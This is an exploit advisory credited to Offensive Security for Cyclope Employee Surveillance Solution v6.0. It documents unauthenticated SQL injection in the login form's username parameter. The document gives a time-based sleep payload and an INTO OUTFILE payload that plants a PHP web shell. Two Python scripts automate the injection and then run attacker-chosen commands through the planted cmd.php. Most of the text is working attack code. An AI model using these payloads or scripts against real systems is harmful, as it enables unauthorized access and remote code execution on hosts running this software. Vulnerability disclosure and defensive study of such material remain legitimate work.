# Author: loneferret of Offensive Security # Product: Cyclope Employee Surveillance Solution v6.0 # Version: 6.0 # Vendor Site: http://www.cyclope-series.com/ # Software Download: http://www.cyclope-series.com/download/index.html # Software description: # The employee monitoring software developed by Cyclope-Series is specially designed to inform # and equip management with statistics relating to the productivity of staff within their organization. # Vulnerability: # Due to improper input sensitization, many parameters are prone to SQL injection. # Most importantly, the username parameter in the application's login form. # # PoC 1: # MySql sleep for 5 seconds. # No Authentication Required. # Page: /index.php # Form: login # Vulnerable Parameter: username # username: x' or sleep(5) and '1'='1 # password: whatever # As stated, nothing is checked before passing "username" to MySql. # This results in MySql sleeping for 5 seconds, and a unsuccessful # attempt. # PoC 2: # Remote Code Execution # No Authentication Required. # Page: /index.php # Form: login # Vulnerable Parameter: username # Creates a small php shell in the application's root folder. # It also has the added bonus of writing the administrator username and password # Side note: # This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\" # If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0). # Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes. ----Python Script Simple Backdoor---- #!/usr/bin/python import urllib, cookielib import urllib2 import sys print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py " print "[*] Ex. : poc.py 127.0.0.1 ipconfig" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] backdoor = "" prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' " prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex') act = 'auth-login' pag = 'login' password = 'hole' cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password}) print "[*] Sending evil payload" resp = opener.open("http://%s:7879/" % rhost, post_params) print "[*] Triggering backdoor" cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost page = urllib.urlopen(cmd) print "[*] Executing command: %s\n" % rcmd shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd) try: page = urllib.urlopen(shell) cmd = page.read() print cmd except: print "[-] Oups! Somthing happened" ---Python Getting Shell--- #!/usr/bin/python import urllib, cookielib import urllib2 import sys print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 2): print "[*] Usage: poc.py " exit(0) rhost = sys.argv[1] backdoor = '''''' prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' " prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex') act = 'auth-login' pag = 'login' password = 'hole' cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password}) print "[*] Sending evil payload" try: resp = opener.open("http://%s:7879/" % rhost, post_params) print "[*] Triggering Shell" shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost page = urllib.urlopen(shell) cmd = page.read() except: print "[-] Oups! Somthing happened"